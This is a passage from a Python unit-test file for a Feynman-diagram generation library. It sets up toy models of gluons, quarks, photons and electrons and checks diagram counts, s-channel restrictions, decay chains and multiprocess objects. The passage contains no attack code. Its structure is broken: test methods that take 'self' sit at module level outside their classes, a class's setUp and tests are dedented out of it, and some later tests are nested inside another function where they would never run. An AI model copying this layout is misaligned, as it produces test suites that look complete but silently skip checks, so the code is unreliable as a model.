        self.myamplitude.generate_diagrams()
        self.assertEqual(len(self.myamplitude.get('diagrams')),
                         goal_no_antiquark[ngluons])
        check_onshell_flags(self.myamplitude.get('diagrams'),
                            antiquark_none[ngluons])
def test_forbidden_s_channel_uux_uuxng(self):
    """Test diagram generation with forbidden s-channel particles.
    """
    goal_no_photon = [3, 14]
    goal_no_quark = [1, 2]
    goal_no_antiquark = [2, 6]
    for ngluons in range(2):
        legs = base_objects.LegList()
        for pdg, is_final in [(-1, False), (1, False), (-1, True), (1, True)]:
            legs.append(base_objects.Leg({'id': pdg, 'state': is_final}))
        legs.extend([base_objects.Leg({'id': 21, 'state': True})] * ngluons)
        myproc = base_objects.Process({'legs': legs,
                                       'model': self.mymodel,
                                       'forbidden_s_channels': [22]})
        self.myamplitude.set('process', myproc)
        self.myamplitude.generate_diagrams()
        self.assertEqual(len(self.myamplitude.get('diagrams')),
                         goal_no_photon[ngluons])
        # Test with u a > u a (+ g)
        legs = base_objects.LegList()
        for pdg, is_final in [(1, False), (22, False), (1, True), (22, True)]:
            legs.append(base_objects.Leg({'id': pdg, 'state': is_final}))
        legs.extend([base_objects.Leg({'id': 21, 'state': True})] * ngluons)
        for forbidden, goals in [([1], goal_no_quark),
                                 ([-1], goal_no_antiquark)]:
            myproc = base_objects.Process({'legs': legs,
                                           'model': self.mymodel,
                                           'forbidden_s_channels': forbidden})
            self.myamplitude.set('process', myproc)
            self.myamplitude.generate_diagrams()
            self.assertEqual(len(self.myamplitude.get('diagrams')),
                             goals[ngluons])
def test_required_s_channel_uux_uuxng(self):
    """Test the number of diagrams uu~>uu~+g with different
    required s-channel particles.
    """
    goal_req_photon = [1, 4]
    goal_req_quark = [1, 4]
    goal_req_photon_or_gluon = [2, 9]
    goal_req_antiquark = [0, 0]
    for ngluons in range(2):
        legs = base_objects.LegList()
        for pdg, is_final in [(-1, False), (1, False), (-1, True), (1, True)]:
            legs.append(base_objects.Leg({'id': pdg, 'state': is_final}))
        legs.extend([base_objects.Leg({'id': 21, 'state': True})] * ngluons)
        # The duplicated requirement [[22], [22]] must reproduce the
        # [[22]] count — diagrams are not double counted.
        for channels, goals in [([[22]], goal_req_photon),
                                ([[21], [22]], goal_req_photon_or_gluon),
                                ([[22], [22]], goal_req_photon)]:
            myproc = base_objects.Process({'legs': legs,
                                           'model': self.mymodel,
                                           'required_s_channels': channels})
            self.myamplitude.set('process', myproc)
            self.myamplitude.generate_diagrams()
            self.assertEqual(len(self.myamplitude.get('diagrams')),
                             goals[ngluons])
        # Test with u a > u a (+ g)
        legs = base_objects.LegList()
        for pdg, is_final in [(1, False), (22, False), (1, True), (22, True)]:
            legs.append(base_objects.Leg({'id': pdg, 'state': is_final}))
        legs.extend([base_objects.Leg({'id': 21, 'state': True})] * ngluons)
        for channels, goals in [([[1]], goal_req_quark),
                                ([[-1]], goal_req_antiquark)]:
            myproc = base_objects.Process({'legs': legs,
                                           'model': self.mymodel,
                                           'required_s_channels': channels})
            self.myamplitude.set('process', myproc)
            self.myamplitude.generate_diagrams()
            self.assertEqual(len(self.myamplitude.get('diagrams')),
                             goals[ngluons])
def test_required_s_channel_decay(self):
    """Test decay processes d > d u u~ + a with required s-channels.
    """
    goal_req_photon = [1, 4]
    goal_req_d = [0, 2]
    goal_req_u = [0, 1]
    goal_req_u_or_d = [0, 3]
    goal_req_antid = [0, 0]
    for nphotons in range(2):
        # d > d u u~ + nphotons a
        legs = base_objects.LegList()
        for pdg, is_final in [(1, False), (1, True), (2, True), (-2, True)]:
            legs.append(base_objects.Leg({'id': pdg, 'state': is_final}))
        legs.extend([base_objects.Leg({'id': 22, 'state': True})] * nphotons)
        for channels, goals in [([[22]], goal_req_photon),
                                ([[21]], goal_req_photon),
                                ([[1, 22]], goal_req_d),
                                ([[2, 22]], goal_req_u),
                                ([[1, 22], [2, 22]], goal_req_u_or_d),
                                ([[-1]], goal_req_antid)]:
            myproc = base_objects.Process({'legs': legs,
                                           'model': self.mymodel,
                                           'required_s_channels': channels})
            self.myamplitude.set('process', myproc)
            self.myamplitude.generate_diagrams()
            self.assertEqual(len(self.myamplitude.get('diagrams')),
                             goals[nphotons])
def test_decay_process_generation(self):
    """Test the decay process generations d > d g g and d > g g d
    """
    # Both orderings of the final state must give the same 3 diagrams.
    for leg_ids in [(1, 1, 21, 21), (1, 21, 21, 1)]:
        legs = base_objects.LegList(
            [base_objects.Leg({'id': pdg, 'state': index > 0})
             for index, pdg in enumerate(leg_ids)])
        myproc = base_objects.Process({'legs': legs,
                                       'model': self.mymodel,
                                       'is_decay_chain': True})
        amplitude = diagram_generation.Amplitude()
        amplitude.set('process', myproc)
        amplitude.generate_diagrams()
        self.assertEqual(len(amplitude.get('diagrams')), 3)
def test_diagram_generation_identical_interactions(self):
    """Test generation with multiple interactions for same particles
    """
    mypartlist = base_objects.ParticleList();
    myinterlist = base_objects.InteractionList();
    # A gluon
    mypartlist.append(base_objects.Particle({'name':'g',
                                             'antiname':'g',
                                             'spin':3,
                                             'color':8,
                                             'mass':'zero',
                                             'width':'zero',
                                             'texname':'g',
                                             'antitexname':'g',
                                             'line':'curly',
                                             'charge':0.,
                                             'pdg_code':21,
                                             'propagating':True,
                                             'is_part':True,
                                             'self_antipart':True}))
    g = mypartlist[-1]
    # A quark U and its antiparticle
    mypartlist.append(base_objects.Particle({'name':'u',
                                             'antiname':'u~',
                                             'spin':2,
                                             'color':3,
                                             'mass':'zero',
                                             'width':'zero',
                                             'texname':'u',
                                             'antitexname':'\bar u',
                                             'line':'straight',
                                             'charge':2. / 3.,
                                             'pdg_code':2,
                                             'propagating':True,
                                             'is_part':True,
                                             'self_antipart':False}))
    u = mypartlist[-1]
    antiu = copy.copy(u)
    antiu.set('is_part', False)
    # A quark D and its antiparticle
    mypartlist.append(base_objects.Particle({'name':'d',
                                             'antiname':'d~',
                                             'spin':2,
                                             'color':3,
                                             'mass':'zero',
                                             'width':'zero',
                                             'texname':'d',
                                             'antitexname':'\bar d',
                                             'line':'straight',
                                             'charge':-1. / 3.,
                                             'pdg_code':1,
                                             'propagating':True,
                                             'is_part':True,
                                             'self_antipart':False}))
    d = mypartlist[-1]
    antid = copy.copy(d)
    antid.set('is_part', False)
    # Gluon couplings to quarks
    myinterlist.append(base_objects.Interaction({
        'id': 1,
        'particles': base_objects.ParticleList([antiu, u, g]),
        'color': [],
        'lorentz':['L1'],
        'couplings':{(0, 0):'GUU'},
        'orders':{'QCD':1}}))
    myinterlist.append(base_objects.Interaction({
        'id': 2,
        'particles': base_objects.ParticleList([antid, d, g]),
        'color': [],
        'lorentz':['L1'],
        'couplings':{(0, 0):'GDD'},
        'orders':{'QCD':1}}))
    # A second interaction with the SAME d-d~-g particle content but a
    # different coupling and order ('NP'): each coupling choice should
    # generate its own diagram.
    myinterlist.append(base_objects.Interaction({
        'id': 3,
        'particles': base_objects.ParticleList([antid, d, g]),
        'color': [],
        'lorentz':['L1'],
        'couplings':{(0, 0):'GNP'},
        'orders':{'NP':1}}))
    mymodel = base_objects.Model()
    mymodel.set('particles', mypartlist)
    mymodel.set('interactions', myinterlist)
    # u~ u > d~ d: one diagram per d-d~-g coupling choice.
    myleglist = base_objects.LegList()
    myleglist.append(base_objects.Leg({'id':-2,
                                       'state':False}))
    myleglist.append(base_objects.Leg({'id':2,
                                       'state':False}))
    myleglist.append(base_objects.Leg({'id':-1,
                                       'state':True}))
    myleglist.append(base_objects.Leg({'id':1,
                                       'state':True}))
    myproc = base_objects.Process({'legs':myleglist,
                                   'model':mymodel})
    myamplitude = diagram_generation.Amplitude(myproc)
    myamplitude.generate_diagrams()
    diagrams = myamplitude.get('diagrams')
    self.assertEqual(len(diagrams), 2)
    self.assertEqual(diagrams[0].get('orders'),{'QCD':2, 'NP':0, 'WEIGHTED':2})
    self.assertEqual(diagrams[1].get('orders'),{'QCD':1, 'NP':1, 'WEIGHTED':2})
    # Add an extra final-state gluon: u~ u > d~ d g.
    myleglist.append(base_objects.Leg({'id':21,
                                       'state':True}))
    myproc = base_objects.Process({'legs':myleglist,
                                   'model':mymodel})
    myamplitude = diagram_generation.Amplitude(myproc)
    myamplitude.generate_diagrams()
    diagrams = myamplitude.get('diagrams')
    self.assertEqual(len(diagrams), 12)
    # Expected coupling orders for the 12 diagrams, in generation order.
    orders = [{'QCD':3, 'NP':0, 'WEIGHTED':3},
              {'QCD':2, 'NP':1, 'WEIGHTED':3},
              {'QCD':2, 'NP':1, 'WEIGHTED':3},
              {'QCD':1, 'NP':2, 'WEIGHTED':3},
              {'QCD':3, 'NP':0, 'WEIGHTED':3},
              {'QCD':2, 'NP':1, 'WEIGHTED':3},
              {'QCD':2, 'NP':1, 'WEIGHTED':3},
              {'QCD':1, 'NP':2, 'WEIGHTED':3},
              {'QCD':3, 'NP':0, 'WEIGHTED':3},
              {'QCD':2, 'NP':1, 'WEIGHTED':3},
              {'QCD':3, 'NP':0, 'WEIGHTED':3},
              {'QCD':2, 'NP':1, 'WEIGHTED':3}]
    for diagram, order in zip(diagrams, orders):
        self.assertEqual(diagram.get('orders'),order)
def test_multiple_interaction_identical_particles(self):
    """Test the case with multiple interactions for identical particles
    """
    mypartlist = base_objects.ParticleList();
    myinterlist = base_objects.InteractionList();
    # A quark U and its antiparticle
    mypartlist.append(base_objects.Particle({'name':'u',
                                             'antiname':'u~',
                                             'spin':2,
                                             'color':3,
                                             'mass':'zero',
                                             'width':'zero',
                                             'texname':'u',
                                             'antitexname':'\bar u',
                                             'line':'straight',
                                             'charge':2. / 3.,
                                             'pdg_code':2,
                                             'propagating':True,
                                             'is_part':True,
                                             'self_antipart':False}))
    u = mypartlist[-1]
    antiu = copy.copy(u)
    antiu.set('is_part', False)
    # A gluon
    mypartlist.append(base_objects.Particle({'name':'g',
                                             'antiname':'g',
                                             'spin':3,
                                             'color':8,
                                             'mass':'zero',
                                             'width':'zero',
                                             'texname':'g',
                                             'antitexname':'g',
                                             'line':'curly',
                                             'charge':0.,
                                             'pdg_code':21,
                                             'propagating':True,
                                             'is_part':True,
                                             'self_antipart':True}))
    g = mypartlist[-1]
    # two different couplings u u g
    myinterlist.append(base_objects.Interaction({
        'id': 1,
        'particles': base_objects.ParticleList([antiu, u, g]),
        'color': [],
        'lorentz':['L1'],
        'couplings':{(0, 0):'GQCD'},
        'orders':{'QCD':1}}))
    myinterlist.append(base_objects.Interaction({
        'id': 2,
        'particles': base_objects.ParticleList([antiu, u, g]),
        'color': [],
        'lorentz':['L1'],
        'couplings':{(0, 0):'GEFF'},
        'orders':{'EFF':1}}))
    # 3 gluon vertex
    # NOTE(review): this vertex is appended to the shared fixture
    # self.myinterlist, not to the local myinterlist used to build
    # mymodel below, so it does NOT enter this test's model (consistent
    # with the expected count of 8 diagrams, which excludes s-channel
    # gluon topologies) — confirm whether the append is intentional or
    # leftover, since it also reuses id 1.
    self.myinterlist.append(base_objects.Interaction({
        'id': 1,
        'particles': base_objects.ParticleList(
            [self.mypartlist[0]] * 3),
        'color': [],
        'lorentz':['L1'],
        'couplings':{(0, 0):'G'},
        'orders':{'QCD':1}}))
    mymodel = base_objects.Model()
    mymodel.set('particles', mypartlist)
    mymodel.set('interactions', myinterlist)
    # g g > u u~
    myleglist = base_objects.LegList()
    myleglist.append(base_objects.Leg({'id':21,
                                       'state':False}))
    myleglist.append(base_objects.Leg({'id':21,
                                       'state':False}))
    myleglist.append(base_objects.Leg({'id':2,
                                       'state':True}))
    myleglist.append(base_objects.Leg({'id':-2,
                                       'state':True}))
    myproc = base_objects.Process({'legs':myleglist,
                                   'model':mymodel})
    myamplitude = diagram_generation.Amplitude()
    myamplitude.set('process', myproc)
    # NOTE(review): no explicit generate_diagrams() call here —
    # presumably get('diagrams') triggers generation on first access;
    # confirm against the Amplitude implementation.
    self.assertEqual(len(myamplitude.get('diagrams')), 8)
    # Every diagram's last vertex must combine the gluon with the
    # u u~ pair.
    goal_lastvx = set([21,2,-2])
    for diag in myamplitude.get('diagrams'):
        self.assertEqual(set([l.get('id') for l in \
                              diag.get('vertices')[-1].get('legs')]),
                         goal_lastvx)
#===============================================================================
# Multiparticle test
#===============================================================================
class MultiparticleTest(unittest.TestCase):
    """Test class for processes with multiparticle labels"""

    # NOTE(review): these containers are class attributes shared across
    # test instances, and setUp appends to them on every run — confirm
    # that no test depends on them being rebuilt from scratch.
    mypartlist = base_objects.ParticleList()
    myinterlist = base_objects.InteractionList()
    mymodel = base_objects.Model()
    myprocess = base_objects.Process()

    def setUp(self):
        """Populate a minimal model (g, u, d, a, e+) with QCD and QED
        three-point couplings plus the 3- and 4-gluon vertices."""
        # A gluon
        self.mypartlist.append(base_objects.Particle({'name':'g',
                                                      'antiname':'g',
                                                      'spin':3,
                                                      'color':8,
                                                      'mass':'zero',
                                                      'width':'zero',
                                                      'texname':'g',
                                                      'antitexname':'g',
                                                      'line':'curly',
                                                      'charge':0.,
                                                      'pdg_code':21,
                                                      'propagating':True,
                                                      'is_part':True,
                                                      'self_antipart':True}))
        # A quark U and its antiparticle
        self.mypartlist.append(base_objects.Particle({'name':'u',
                                                      'antiname':'u~',
                                                      'spin':2,
                                                      'color':3,
                                                      'mass':'zero',
                                                      'width':'zero',
                                                      'texname':'u',
                                                      'antitexname':'\bar u',
                                                      'line':'straight',
                                                      'charge':2. / 3.,
                                                      'pdg_code':2,
                                                      'propagating':True,
                                                      'is_part':True,
                                                      'self_antipart':False}))
        antiu = copy.copy(self.mypartlist[1])
        antiu.set('is_part', False)
        # A quark D and its antiparticle
        self.mypartlist.append(base_objects.Particle({'name':'d',
                                                      'antiname':'d~',
                                                      'spin':2,
                                                      'color':3,
                                                      'mass':'zero',
                                                      'width':'zero',
                                                      'texname':'d',
                                                      'antitexname':'\bar d',
                                                      'line':'straight',
                                                      'charge':-1. / 3.,
                                                      'pdg_code':1,
                                                      'propagating':True,
                                                      'is_part':True,
                                                      'self_antipart':False}))
        antid = copy.copy(self.mypartlist[2])
        antid.set('is_part', False)
        # A photon
        self.mypartlist.append(base_objects.Particle({'name':'a',
                                                      'antiname':'a',
                                                      'spin':3,
                                                      'color':1,
                                                      'mass':'zero',
                                                      'width':'zero',
                                                      'texname':'\gamma',
                                                      'antitexname':'\gamma',
                                                      'line':'wavy',
                                                      'charge':0.,
                                                      'pdg_code':22,
                                                      'propagating':True,
                                                      'is_part':True,
                                                      'self_antipart':True}))
        # A electron and positron
        self.mypartlist.append(base_objects.Particle({'name':'e+',
                                                      'antiname':'e-',
                                                      'spin':2,
                                                      'color':1,
                                                      'mass':'zero',
                                                      'width':'zero',
                                                      'texname':'e^+',
                                                      'antitexname':'e^-',
                                                      'line':'straight',
                                                      'charge':-1.,
                                                      'pdg_code':11,
                                                      'propagating':True,
                                                      'is_part':True,
                                                      'self_antipart':False}))
        antie = copy.copy(self.mypartlist[4])
        antie.set('is_part', False)
        # 3 gluon vertex
        self.myinterlist.append(base_objects.Interaction({
            'id': 1,
            'particles': base_objects.ParticleList(
                [self.mypartlist[0]] * 3),
            'color': [],
            'lorentz':['L1'],
            'couplings':{(0, 0):'G'},
            'orders':{'QCD':1}}))
        # 4 gluon vertex
        self.myinterlist.append(base_objects.Interaction({
            'id': 2,
            'particles': base_objects.ParticleList(
                [self.mypartlist[0]] * 4),
            'color': [],
            'lorentz':['L1'],
            'couplings':{(0, 0):'G^2'},
            'orders':{'QCD':2}}))
        # Gluon and photon couplings to quarks
        self.myinterlist.append(base_objects.Interaction({
            'id': 3,
            'particles': base_objects.ParticleList(
                [self.mypartlist[1], antiu, self.mypartlist[0]]),
            'color': [],
            'lorentz':['L1'],
            'couplings':{(0, 0):'GQQ'},
            'orders':{'QCD':1}}))
        self.myinterlist.append(base_objects.Interaction({
            'id': 4,
            'particles': base_objects.ParticleList(
                [self.mypartlist[1], antiu, self.mypartlist[3]]),
            'color': [],
            'lorentz':['L1'],
            'couplings':{(0, 0):'GQED'},
            'orders':{'QED':1}}))
        self.myinterlist.append(base_objects.Interaction({
            'id': 5,
            'particles': base_objects.ParticleList(
                [self.mypartlist[2], antid, self.mypartlist[0]]),
            'color': [],
            'lorentz':['L1'],
            'couplings':{(0, 0):'GQQ'},
            'orders':{'QCD':1}}))
        self.myinterlist.append(base_objects.Interaction({
            'id': 6,
            'particles': base_objects.ParticleList(
                [self.mypartlist[2], antid, self.mypartlist[3]]),
            'color': [],
            'lorentz':['L1'],
            'couplings':{(0, 0):'GQED'},
            'orders':{'QED':1}}))
        # Coupling of e to gamma
        self.myinterlist.append(base_objects.Interaction({
            'id': 7,
            'particles': base_objects.ParticleList(
                [self.mypartlist[4], antie, self.mypartlist[3]]),
            'color': [],
            'lorentz':['L1'],
            'couplings':{(0, 0):'GQED'},
            'orders':{'QED':1}}))
        self.mymodel.set('particles', self.mypartlist)
        self.mymodel.set('interactions', self.myinterlist)
#===============================================================================
# DecayChainAmplitudeTest
#===============================================================================
class DecayChainAmplitudeTest(unittest.TestCase):
    """Test class for the DecayChainAmplitude object"""

    # Class-level fixtures; setUp fills mymodel and rebuilds mydict and
    # my_decay_chain before each test.
    # NOTE(review): class attributes are shared between test instances
    # rather than per-instance — confirm no test relies on fresh copies.
    mydict = {}
    mymodel = base_objects.Model()
    my_amplitudes = diagram_generation.AmplitudeList()
    my_decay_chains = diagram_generation.DecayChainAmplitudeList()
    my_decay_chain = diagram_generation.DecayChainAmplitude()
def setUp(self):
    """Build a minimal model (g, u, d, a, e+) with QCD and QED couplings
    and construct the reference DecayChainAmplitude used by the tests."""
    mypartlist = base_objects.ParticleList()
    myinterlist = base_objects.InteractionList()
    # A gluon
    mypartlist.append(base_objects.Particle({'name':'g',
                                             'antiname':'g',
                                             'spin':3,
                                             'color':8,
                                             'mass':'zero',
                                             'width':'zero',
                                             'texname':'g',
                                             'antitexname':'g',
                                             'line':'curly',
                                             'charge':0.,
                                             'pdg_code':21,
                                             'propagating':True,
                                             'is_part':True,
                                             'self_antipart':True}))
    # A quark U and its antiparticle
    mypartlist.append(base_objects.Particle({'name':'u',
                                             'antiname':'u~',
                                             'spin':2,
                                             'color':3,
                                             'mass':'zero',
                                             'width':'zero',
                                             'texname':'u',
                                             'antitexname':'\bar u',
                                             'line':'straight',
                                             'charge':2. / 3.,
                                             'pdg_code':2,
                                             'propagating':True,
                                             'is_part':True,
                                             'self_antipart':False}))
    antiu = copy.copy(mypartlist[1])
    antiu.set('is_part', False)
    # A quark D and its antiparticle
    mypartlist.append(base_objects.Particle({'name':'d',
                                             'antiname':'d~',
                                             'spin':2,
                                             'color':3,
                                             'mass':'zero',
                                             'width':'zero',
                                             'texname':'d',
                                             'antitexname':'\bar d',
                                             'line':'straight',
                                             'charge':-1. / 3.,
                                             'pdg_code':1,
                                             'propagating':True,
                                             'is_part':True,
                                             'self_antipart':False}))
    antid = copy.copy(mypartlist[2])
    antid.set('is_part', False)
    # A photon
    mypartlist.append(base_objects.Particle({'name':'a',
                                             'antiname':'a',
                                             'spin':3,
                                             'color':1,
                                             'mass':'zero',
                                             'width':'zero',
                                             'texname':'\gamma',
                                             'antitexname':'\gamma',
                                             'line':'wavy',
                                             'charge':0.,
                                             'pdg_code':22,
                                             'propagating':True,
                                             'is_part':True,
                                             'self_antipart':True}))
    # A electron and positron
    mypartlist.append(base_objects.Particle({'name':'e+',
                                             'antiname':'e-',
                                             'spin':2,
                                             'color':1,
                                             'mass':'zero',
                                             'width':'zero',
                                             'texname':'e^+',
                                             'antitexname':'e^-',
                                             'line':'straight',
                                             'charge':-1.,
                                             'pdg_code':11,
                                             'propagating':True,
                                             'is_part':True,
                                             'self_antipart':False}))
    antie = copy.copy(mypartlist[4])
    antie.set('is_part', False)
    # 3 gluon vertex
    myinterlist.append(base_objects.Interaction({
        'id': 1,
        'particles': base_objects.ParticleList(
            [mypartlist[0]] * 3),
        'color': [],
        'lorentz':['L1'],
        'couplings':{(0, 0):'G'},
        'orders':{'QCD':1}}))
    # 4 gluon vertex
    myinterlist.append(base_objects.Interaction({
        'id': 2,
        'particles': base_objects.ParticleList(
            [mypartlist[0]] * 4),
        'color': [],
        'lorentz':['L1'],
        'couplings':{(0, 0):'G^2'},
        'orders':{'QCD':2}}))
    # Gluon and photon couplings to quarks
    myinterlist.append(base_objects.Interaction({
        'id': 3,
        'particles': base_objects.ParticleList(
            [mypartlist[1], antiu, mypartlist[0]]),
        'color': [],
        'lorentz':['L1'],
        'couplings':{(0, 0):'GQQ'},
        'orders':{'QCD':1}}))
    myinterlist.append(base_objects.Interaction({
        'id': 4,
        'particles': base_objects.ParticleList(
            [mypartlist[1], antiu, mypartlist[3]]),
        'color': [],
        'lorentz':['L1'],
        'couplings':{(0, 0):'GQED'},
        'orders':{'QED':1}}))
    myinterlist.append(base_objects.Interaction({
        'id': 5,
        'particles': base_objects.ParticleList(
            [mypartlist[2], antid, mypartlist[0]]),
        'color': [],
        'lorentz':['L1'],
        'couplings':{(0, 0):'GQQ'},
        'orders':{'QCD':1}}))
    myinterlist.append(base_objects.Interaction({
        'id': 6,
        'particles': base_objects.ParticleList(
            [mypartlist[2], antid, mypartlist[3]]),
        'color': [],
        'lorentz':['L1'],
        'couplings':{(0, 0):'GQED'},
        'orders':{'QED':1}}))
    # Coupling of e to gamma
    myinterlist.append(base_objects.Interaction({
        'id': 7,
        'particles': base_objects.ParticleList(
            [mypartlist[4], antie, mypartlist[3]]),
        'color': [],
        'lorentz':['L1'],
        'couplings':{(0, 0):'GQED'},
        'orders':{'QED':1}}))
    self.mymodel.set('particles', mypartlist)
    self.mymodel.set('interactions', myinterlist)
    # Reference dict and object that the get/set/repr tests compare to.
    self.mydict = {'amplitudes': self.my_amplitudes,
                   'decay_chains': self.my_decay_chains}
    self.my_decay_chain = diagram_generation.DecayChainAmplitude(
        self.mydict)
def test_setget_process_correct(self):
    "Test correct DecayChainAmplitude object __init__, get and set"
    # Setting every reference property one by one must reproduce the
    # dict-constructed object exactly.
    constructed = diagram_generation.DecayChainAmplitude()
    for key, value in self.mydict.items():
        constructed.set(key, value)
    self.assertEqual(self.my_decay_chain, constructed)
def test_setget_process_exceptions(self):
    "Test error raising in DecayChainAmplitude __init__, get and set"
    wrong_dict = self.mydict
    wrong_dict['wrongparam'] = 'wrongvalue'
    a_number = 0
    phys_error = diagram_generation.DecayChainAmplitude.PhysicsObjectError
    # __init__ rejects unknown keys and non-dict arguments
    self.assertRaises(phys_error,
                      diagram_generation.DecayChainAmplitude,
                      wrong_dict)
    self.assertRaises(AssertionError,
                      diagram_generation.DecayChainAmplitude,
                      a_number)
    # get rejects non-string and unknown property names
    self.assertRaises(AssertionError,
                      self.my_decay_chain.get,
                      a_number)
    self.assertRaises(phys_error,
                      self.my_decay_chain.get,
                      'wrongparam')
    # set likewise
    self.assertRaises(AssertionError,
                      self.my_decay_chain.set,
                      a_number, 0)
    self.assertRaises(phys_error,
                      self.my_decay_chain.set,
                      'wrongparam', 0)
def test_representation(self):
    """Test process object string representation."""
    # Build the expected string piecewise; the whitespace inside these
    # literals must match the object's __str__ output exactly.
    goal = "{\n"
    goal = goal + " \'amplitudes\': %s,\n" % repr(diagram_generation.AmplitudeList())
    goal = goal + " \'decay_chains\': %s\n}" % repr(diagram_generation.AmplitudeList())
    self.assertEqual(goal, str(self.my_decay_chain))
def test_decay_chain_pp_jj(self):
    """Test a decay chain process pp > jj, j > jj based on
    multiparticle lists
    """
    p = [1, -1, 2, -2, 21]
    jet = base_objects.MultiLeg({'ids': p, 'state': True});
    # Core process: j j > j j
    core_legs = base_objects.MultiLegList([copy.copy(leg)
                                           for leg in [jet] * 4])
    core_legs[0].set('state', False)
    core_legs[1].set('state', False)
    core_def = base_objects.ProcessDefinition({'legs': core_legs,
                                               'model': self.mymodel})
    # Decay: j > j j j
    decay_legs = base_objects.MultiLegList([copy.copy(leg)
                                            for leg in [jet] * 4])
    decay_legs[0].set('state', False)
    decay_def = base_objects.ProcessDefinition({'legs': decay_legs,
                                                'model': self.mymodel})
    core_def.set('decay_chains',
                 base_objects.ProcessDefinitionList([decay_def]))
    my_decay_chain_amps = diagram_generation.DecayChainAmplitude(core_def)
    self.assertEqual(len(my_decay_chain_amps.get('amplitudes')), 35)
    self.assertEqual(len(my_decay_chain_amps.get('decay_chains')), 1)
    self.assertEqual(
        len(my_decay_chain_amps.get('decay_chains')[0].get('amplitudes')),
        15)
    # Check that all onshell flags are set appropriately: a leg may be
    # flagged onshell only on its first appearance and only if it is
    # final-state.
    for amp in my_decay_chain_amps.get('amplitudes'):
        for diagram in amp.get('diagrams'):
            seen = set()
            for vertex in diagram.get('vertices'):
                for leg in vertex.get('legs'):
                    first_time = leg.get('number') not in seen
                    if leg.get('onshell'):
                        self.assertTrue(leg.get('state') and first_time)
                    else:
                        self.assertTrue(not leg.get('state') or
                                        not first_time)
                    seen.add(leg.get('number'))
    def test_unused_decays_in_decay_chain_pp_jj(self):
        """Test removal of unused decays in decay chain qq > qq, j > jj
        """

        # "p" includes the gluon, "q" only quarks; the core process uses q
        # while the decay definition uses p, so gluon decays are never needed.
        p = [1, -1, 2, -2, 21]
        q = [1, -1, 2, -2]

        my_multi_leg = base_objects.MultiLeg({'ids': q, 'state': True});

        # Define the multiprocess: q q > q q
        my_multi_leglist = base_objects.MultiLegList([copy.copy(leg) for leg in [my_multi_leg] * 4])

        my_multi_leglist[0].set('state', False)
        my_multi_leglist[1].set('state', False)

        my_process_definition = base_objects.ProcessDefinition({'legs':my_multi_leglist,
                                                                'model':self.mymodel})

        # Decay definition j > j j with the broader multiparticle p
        my_multi_leg = base_objects.MultiLeg({'ids': p, 'state': True});
        my_decay_leglist = base_objects.MultiLegList([copy.copy(leg) for leg in [my_multi_leg] * 4])
        my_decay_leglist[0].set('state', False)
        my_decay_processes = base_objects.ProcessDefinition({\
                                               'legs':my_decay_leglist,
                                               'model':self.mymodel})

        my_process_definition.set('decay_chains',
                                  base_objects.ProcessDefinitionList(\
                                                        [my_decay_processes]))

        decay_chain = diagram_generation.DecayChainAmplitude(\
                                                       my_process_definition)

        # Check that all decays are quarks, no gluons: the gluon decay
        # (never produced by the core process) must have been pruned.
        for dc_amp in decay_chain.get('decay_chains')[0].get('amplitudes'):
            self.assertTrue(dc_amp.get('process').get('legs')[0].get('id') in q)
    def test_forbidden_s_channel_decay_chain(self):
        """Test decay chains with forbidden s-channel particles.
        """

        goal_no_quark = 6
        # For each diagram index, the vertex indices where the propagator
        # (last leg of the vertex) must carry onshell == False due to the
        # forbidden on-shell s-channel d quark (pdg 1); all other
        # propagators must stay at onshell == None.
        quark_none = {0:[0,1],1:[0,1],3:[1],5:[1]}

        # Test with u a > u a (+ g)
        myleglist = base_objects.LegList()

        myleglist.append(base_objects.Leg({'id':1,
                                           'state':False}))
        myleglist.append(base_objects.Leg({'id':22,
                                           'state':False}))
        myleglist.append(base_objects.Leg({'id':1,
                                           'state':True}))
        myleglist.append(base_objects.Leg({'id':22,
                                           'state':True}))
        myleglist.extend([base_objects.Leg({'id':21,
                                            'state':True})])

        myproc = base_objects.Process({'legs':myleglist,
                                       'model':self.mymodel,
                                       'forbidden_onsh_s_channels':[1]})

        # Decay definition: d > a d
        myleglist = base_objects.LegList()

        myleglist.append(base_objects.Leg({'id':1,
                                           'state':False}))
        myleglist.append(base_objects.Leg({'id':22,
                                           'state':True}))
        myleglist.append(base_objects.Leg({'id':1,
                                           'state':True}))

        mydecayproc = base_objects.Process({'legs':myleglist,
                                            'model':self.mymodel})

        myproc.set('decay_chains', base_objects.ProcessList([mydecayproc]))

        myamplitude = diagram_generation.DecayChainAmplitude(myproc)
        #print myamplitude.nice_string()

        self.assertEqual(len(myamplitude.get('amplitudes')[0].get('diagrams')),
                         goal_no_quark)

        #print myamplitude.nice_string()

        # Verify the onshell flag of every propagator against quark_none.
        diagrams = myamplitude.get('amplitudes')[0].get('diagrams')
        for idiag in range(len(diagrams)):
            if idiag in quark_none:
                vertices = diagrams[idiag].get('vertices')
                for ivert in range(len(vertices)):
                    if ivert in quark_none[idiag]:
                        self.assertEqual(False,
                                 vertices[ivert].get('legs')[-1].get('onshell'))
                    else:
                        self.assertEqual(None,
                                 vertices[ivert].get('legs')[-1].get('onshell'))
            else:
                # Diagrams without a forbidden s-channel must have no
                # explicitly-forbidden (False) propagators at all.
                self.assertFalse(any([vert.get('legs')[-1].get('onshell') == False\
                                      for vert in diagrams[idiag].get('vertices')]))
#===============================================================================
# MultiProcessTest
#===============================================================================
class MultiProcessTest(unittest.TestCase):
    """Test class for the MultiProcess object"""

    # Class-level placeholders; setUp rebuilds every one of these for each
    # test, so no state is shared between tests.
    mydict = {}
    my_process_definition = None
    mymodel = base_objects.Model()
    my_multi_leglist = base_objects.MultiLegList()
    my_process_definitions = base_objects.ProcessDefinitionList()
    my_processes = base_objects.ProcessList()
    my_multi_process = diagram_generation.MultiProcess()
    def setUp(self):
        """Build a minimal QCD+QED model (g, u, d, a, e-) and a default
        MultiProcess fixture used by the tests below."""

        mypartlist = base_objects.ParticleList()
        myinterlist = base_objects.InteractionList()

        # A gluon
        mypartlist.append(base_objects.Particle({'name':'g',
                      'antiname':'g',
                      'spin':3,
                      'color':8,
                      'mass':'zero',
                      'width':'zero',
                      'texname':'g',
                      'antitexname':'g',
                      'line':'curly',
                      'charge':0.,
                      'pdg_code':21,
                      'propagating':True,
                      'is_part':True,
                      'self_antipart':True}))

        # A quark U and its antiparticle
        mypartlist.append(base_objects.Particle({'name':'u',
                      'antiname':'u~',
                      'spin':2,
                      'color':3,
                      'mass':'zero',
                      'width':'zero',
                      'texname':'u',
                      'antitexname':'\bar u',
                      'line':'straight',
                      'charge':2. / 3.,
                      'pdg_code':2,
                      'propagating':True,
                      'is_part':True,
                      'self_antipart':False}))
        antiu = copy.copy(mypartlist[1])
